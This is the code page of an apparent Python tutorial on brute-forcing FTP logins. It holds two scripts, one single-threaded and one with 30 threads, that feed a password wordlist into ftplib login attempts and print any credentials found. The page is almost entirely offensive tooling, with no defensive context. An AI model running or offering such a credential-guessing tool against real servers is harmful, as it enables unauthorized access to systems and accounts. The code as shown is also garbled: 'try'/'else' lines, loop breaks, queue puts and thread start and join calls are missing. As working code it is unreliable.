Code for How to Brute Force FTP Servers in Python Tutorial

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import ftplib
from colorama import Fore, init # for fancy colors, nothing else

# init the console for colors (for Windows)
# hostname or IP address of the FTP server
host = ""
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21

def is_correct(password):
    # initialize the FTP server object
    server = ftplib.FTP()
    print(f"[!] Trying", password)
        # tries to connect to FTP server with a timeout of 5
        server.connect(host, port, timeout=5)
        # login using the credentials (user & password)
        server.login(user, password)
    except ftplib.error_perm:
        # login failed, wrong credentials
        return False
        # correct credentials
        print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
        return True

# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")
print("[+] Passwords to try:", len(passwords))

# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
    if is_correct(password):

import ftplib
from threading import Thread
import queue
from colorama import Fore, init # for fancy colors, nothing else

# init the console for colors (for Windows)
# init()
# initialize the queue
q = queue.Queue()
# number of threads to spawn
n_threads = 30

# hostname or IP address of the FTP server
host = ""
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21

def connect_ftp():
    global q
    while True:
        # get the password from the queue
        password = q.get()
        # initialize the FTP server object
        server = ftplib.FTP()
        print("[!] Trying", password)
            # tries to connect to FTP server with a timeout of 5
            server.connect(host, port, timeout=5)
            # login using the credentials (user & password)
            server.login(user, password)
        except ftplib.error_perm:
            # login failed, wrong credentials
            # correct credentials
            print(f"{Fore.GREEN}[+] Found credentials: ")
            print(f"\tHost: {host}")
            print(f"\tUser: {user}")
            print(f"\tPassword: {password}{Fore.RESET}")
            # we found the password, let's clear the queue
            with q.mutex:
                q.unfinished_tasks = 0
            # notify the queue that the task is completed for this password

# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")

print("[+] Passwords to try:", len(passwords))

# put all passwords to the queue
for password in passwords:

# create `n_threads` that runs that function
for t in range(n_threads):
    thread = Thread(target=connect_ftp)
    # will end when the main thread end
    thread.daemon = True
# wait for the queue to be empty